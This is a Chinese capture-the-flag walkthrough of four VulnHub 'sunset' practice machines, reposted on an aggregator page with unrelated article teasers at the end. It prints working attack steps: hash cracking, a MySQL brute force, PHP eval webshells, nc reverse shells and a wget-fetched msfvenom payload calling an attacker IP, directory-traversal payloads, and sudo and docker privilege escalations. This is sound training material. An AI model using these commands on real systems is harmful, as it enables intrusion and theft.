vulnhub sunset系列靶機合集(部分)

描述:該合集包含sunset系列適合新手的四個靶機(sunset:1、dusk、sunrise、noontide)的滲透全過程。

靶機下載地址:Vulnerable By Design - Search: sunset ~ VulnHubhttps://www.vulnhub.com/?q=sunset

sunset:1

滲透過程

信息收集

確認目標主機ip:192.168.56.126,并且開放21,22端口。

nmap 192.168.56.0/24 -Pn?nmap 192.168.56.126 -A -T4

FTP匿名登錄

anonymou:空密碼

mget命令下載backup文件到本地,獲得類似于shadow文件中密碼加密的部分。

CREDENTIALS: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X. ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/?

john破解

重點看一下

sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/

$6表示是SHA-512加密。

john backup

sunset:cheer14

ssh連接成功,獲得user.txt。

ed提權

sudo ed
!/bin/sh

命令參考ed | GTFOBins

提權成功。

sunset:dusk

滲透過程

信息收集

nmap 192.168.56.0/24 -Pnnmap 192.168.56.127 -A -T4

開放端口:21,22,25,80,3306,8080。

8080端口提示當前目錄是/var/tmp。

hydra爆破數據庫

沒什么收獲嘗試爆破ssh,mysql密碼。

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.56.127 mysql

root:password,成功連接數據庫。

mysql寫入webshell

根據前面8080端口提示的路徑/var/tmp,向該路徑寫入一句話木馬。

select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/1.php";

驗證一下,成功寫入了一句話木馬。

蟻劍連接時發現返回空,換個一句話木馬

select "<?php @eval($_POST['cmd']);?>" INTO OUTFILE "/var/tmp/shell.php";

之后上傳反彈shell文件即可or不連接蟻劍直接nc反彈shell

http://192.168.56.127:8080/shell.php?cmd=system(%27nc%20-e%20/bin/sh%20192.168.56.109%208888%27);

http://192.168.56.127:8080/1.php?cmd=system(%27nc%20-e%20/bin/sh%20192.168.56.109%208888%27);

python獲取tty

python -c 'import pty;pty.spawn("/bin/bash")'

get user.txt。

提權

提權到dusk。

COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"

這時注意到dusk屬于docker組。

docker用戶組提權

docker用戶組提權原理不說了,利用過程簡而言之就是利用任意鏡像創建容器。

docker images# 沒有鏡像就拉一個
docker pull alpinedocker run -v /:/mnt -it apline# 參數解析
-v # 給容器掛載存儲卷,掛載到容器的某個目錄
-i # 控制臺交互
-t # 分配tty設備

get root.txt。

sunset:sunrise

滲透過程

信息收集

nmap 192.168.56.0/24 -Pnnmap 192.168.56.130 -A -T4

全面掃描還是有必要的,例如這里主機發現時知道開放了22,80,3306端口;全面掃描后發現還有8080端口也開放了。

訪問8080端口得到一個信息weborf0.12.2。

weborf目錄穿越

searchsploit搜索一下有沒有漏洞可以利用。

有一個目錄穿越可以試試。

..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

得到信息:存在sunrise和weborf兩個用戶。

通過目錄穿越看看兩個用戶目錄下有沒有什么可用信息。

/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

get user.txt.

a6050aecf6303b0b824038807d823a89

挨個看沒發現什么。

direarch再掃一下/weborf目錄下的文件。

dirsearch -u http://192.168.56.130:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

在.mysql_history中得到一組用戶名密碼。

show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44'; 

用這組密碼ssh連接成功,mysql連接成功。

在mysql數據庫user表中得到sunrise的明文密碼thefutureissobrightigottawearshades和root用戶的加密密碼(md5解密,需要付費暫時放棄,看看有沒有其他方法提權到root)。

提權

切換到sunrise用戶后,sudo -l。

wine命令提權,這個命令就是linux用來運行exe文件的。因此,嘗試msf生成一個exe木馬,上傳到目標機用wine命令執行。

# 攻擊機
msfvenom -p windows/meterpreter/reverse_tcp -f exe  --platform windows -a x86 LHOST=192.168.56.109 LPORT=4444 -o 1.exe# 開啟簡易http
python -m http.server# msf開啟監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.109
run# 目標機
cd tmp
wget http://192.168.56.109:8000/1.exe
/usr/bin/wine 1.exe

get root.txt.

sunset:noontide

滲透過程

簡單信息收集

# 主機發現
nmap 192.168.56.0/24 -Pn
?
# 端口掃描
nmap 192.168.56.124 -A -T4

發現僅開放6667端口,版本信息:UnrealIRCd

UnrealIRCd漏洞利用

msfconsole
search UnrealIRCd

use 0
set payload cmd/unix/reverse_perl
set RHOSTS 192.168.56.124
set LHOSTS 
run

通過python獲得一個完整的tty。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get local.txt

弱口令root....切換到root權限。

get proof.txt🎆

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/76527.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/76527.shtml
英文地址,請注明出處:http://en.pswp.cn/web/76527.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【MySQL】MySQL的基礎語法及其語句的介紹

1、基礎語法 mysql -h【主機名】 -u【用戶名】 -p //登錄MySQL exit或quit; //退出MySQL show database; //查看MySQL下的所有數據庫 use 【數據庫名】; //進入數據庫 show tables; //查看數據庫下的所有表名 *MySQL的啟動和關閉 &am…

2025-4-20-C++ 學習 數組(1)

數組 2025-4-20-C++ 學習 數組(1)P1428 小魚比可愛題目描述輸入格式輸出格式輸入輸出樣例 #1輸入 #1輸出 #1說明/提示題解代碼P1427 小魚的數字游戲題目描述輸入格式輸出格式輸入輸出樣例 #1輸入 #1輸出 #1說明/提示數據規模與約定題解代碼P5727 【深基5.例3】冰雹猜想題目描…

ESP-ADF外設子系統深度解析:esp_peripherals組件架構與核心設計(顯示輸出類外設之LCD)

目錄 ESP-ADF外設子系統深度解析&#xff1a;esp_peripherals組件架構與核心設計&#xff08;顯示輸出類外設之LCD&#xff09;簡介模塊概述功能定義架構位置核心特性 LCD外設分析LCD外設概述LCD外設層次架構圖 LCD外設API和數據結構外設層API公共API內部數據結構 LCD外設配置選…

面試題:循環引用兩個節點相互引用,如何判斷哪個用 shared_ptr?哪個用 weak_ptr?

目錄 1.引言 2.原理 3.所有權模型與指針選擇 4.復雜場景的決策策略 5.注意事項 6.總結 1.引言 當兩個對象通過 shared_ptr 相互引用時&#xff0c;會產生循環引用問題&#xff0c;導致內存泄漏。因為這兩個對象的引用計數永遠不會變為 0&#xff0c;即使它們在程序的其他…

QT聊天項目DAY06

1.從git上同步項目 編譯測試&#xff0c;編譯通過 Post請求測試 測試成功 2. email is 打印有問題&#xff0c;檢查 解析結果是存儲在jsonResult中的&#xff0c;修改 3. 客戶端實現Post驗證碼請求 3.1 同步Qt客戶端項目 檢查QT版本&#xff0c;由于我在公司用的還是QT5.12.9…

PHP騰訊云人臉核身獲取FaceId

參考騰訊云官方文檔&#xff1a; 人臉核身 合作方后臺上傳身份信息_騰訊云 前提&#xff1a;已經獲取了SIGN Ticket。獲取參考文檔&#xff1a; PHP騰訊云人臉核身獲取SIGN Ticket-CSDN博客 public function getTxFaceId($uid,$name,$idNo){$appId ;$userId $uid;$nonce …

用 Deepseek 寫的uniapp油耗計算器

下面是一個基于 Uniapp 的油耗計算器實現&#xff0c;包含 Vue 組件和頁面代碼。 1. 創建頁面文件 在 pages 目錄下創建 fuel-calculator 頁面&#xff1a; <!-- pages/fuel-calculator/fuel-calculator.vue --> <template><view class"container"…

Redis ④-通用命令

Redis 是一個 客戶端-服務器 結構的程序&#xff0c;這與 MySQL 是類似的&#xff0c;這點需要牢記&#xff01;&#xff01;&#xff01; Redis 固然好&#xff0c;但也不是任何場景都適合使用 Redis&#xff0c;一定要根據當前的業務需求來選擇是否使用 Redis Redis 通用命令…

HarmonyOs學習 環境配置后 實驗1:創建項目Hello World

HarmonyOS開發入門&#xff1a;環境配置與Hello World實驗 實驗目標 掌握HarmonyOS開發環境配置&#xff0c;創建首個HarmonyOS應用并實現"Hello World"界面展示 實驗準備 已安裝DevEco Studio開發環境已配置HarmonyOS開發依賴項熟悉基本TypeScript/ArkTS語法&am…

HTTP:十.cookie機制

Cookie概念及類型 HTTP cookie,簡稱cookie,又稱數碼存根、“網站/瀏覽+魔餅/魔片”等,是瀏覽網站時由網絡服務器創建并由網頁瀏覽器存放在用戶計算機或其他設備的小文本文件。Cookie使Web服務器能在用戶的設備存儲狀態信息(如添加到在線商店購物車中的商品)或跟蹤用戶…

記錄小程序第一次調用Api,基于騰訊云Serverless函數,實現小程序的成功接入api,以及數據調用

目錄 創建騰訊云個人賬戶新建severless應用建立函數URL小程序中調用api示例 創建騰訊云個人賬戶 百度搜索即可&#xff0c;并注冊 新建severless應用 作者以github下載的某Api為例&#xff0c;這里不展示具體Api&#xff0c;只關注操作即可&#xff0c;相信都是互通的 在騰…

ES6 第一講 變量定義 堆與棧 字符串的擴展和數值型的擴展

文章目錄 1.ES6變量定義2.ES6堆和棧3.字符串的擴展3.1 模板字符串3.2 判斷是否以指定的字符串開頭或結尾3.3 字符串重復輸出3.4 填充方法3.5 去除前后字符串空格3.6 返回參數指定位置的字符 4. 數值型的擴展4.1 二進制0B 八進制0O4.2 判斷是否是一個無窮大的數字 &#xff08;判…

LeetCode第158題_用Read4讀取N個字符 II

LeetCode 第158題&#xff1a;用Read4讀取N個字符 II 題目描述 給你一個文件&#xff0c;并且該文件只能通過給定的 read4 方法來讀取&#xff0c;請實現一個方法來讀取 n 個字符。 read4 方法&#xff1a; API read4 可以從文件中讀取 4 個連續的字符&#xff0c;并且將它…

算法篇之單調棧

單調棧算法入門 單調棧是一種特殊的數據結構應用&#xff0c;它的核心在于維護一個棧&#xff0c;使得棧內元素保持單調遞增或者單調遞減的順序。這種數據結構在解決很多算法問題時非常有效&#xff0c;例如求數組中每個元素的下一個更大元素、每日溫度問題等。 一、單調棧的…

Kubernetes控制平面組件:調度器Scheduler(二)

云原生學習路線導航頁&#xff08;持續更新中&#xff09; kubernetes學習系列快捷鏈接 Kubernetes架構原則和對象設計&#xff08;一&#xff09;Kubernetes架構原則和對象設計&#xff08;二&#xff09;Kubernetes架構原則和對象設計&#xff08;三&#xff09;Kubernetes控…

【網絡】數據鏈路層知識梳理

全是通俗易懂的講解&#xff0c;如果你本節之前的知識都掌握清楚&#xff0c;那就速速來看我的筆記吧~ 自己寫自己的八股&#xff01;讓未來的自己看懂&#xff01; &#xff08;全文手敲&#xff0c;受益良多&#xff09; 數據鏈路層 我們來重新理解一下這個圖&#xff1a;…

機器學習(神經網絡基礎篇)——個人理解篇6(概念+代碼)

1 在聲明一個類中&#xff0c;構建一個屬于類的函數&#xff0c;前面為什要加上“self”&#xff1f; 就像下面這一串代碼&#xff1a; class TwoLayerNet:def __init__(self, input_size, hidden_size, output_size,weight_init_std0.01):# 初始化權重self.params {}self.p…

Cribl 對Windows-xml log 進行 -Removing filed-06

Removing Fields Description? The Eval Function can be used to add or remove fields. In this example we will remove the extracted fields while preserving _raw, _time,index,source, sourcetype. Steps - Adding an Eval Function

chili3d調試6 添加左側面板

注釋前 一個一個注釋看對應哪個窗口 無事發生 子方法不是顯示的窗口 注釋掉看看 沒了 注釋這個看看 零件頁面沒了 這個瀏覽器居然完全不用關的&#xff0c;刷新就重載了 注釋看看 無工具欄版本 sidebar&#xff1a; 往框框里面加入 div({ className: style.input }, user_…

Linux學習——了解和熟悉Linux系統的遠程終端登錄

Linux學習——了解和熟悉Linux系統的遠程終端登錄 一.配置Ubuntu系統的網絡和用戶 1、設置虛擬機網絡為橋接模式 打開VMWare&#xff0c;選擇編輯虛擬機設置&#xff0c;在網絡適配器設置中&#xff0c;選擇“橋接模式”&#xff0c;保存設置并啟動Ubuntu。 2、配置Ubuntu的…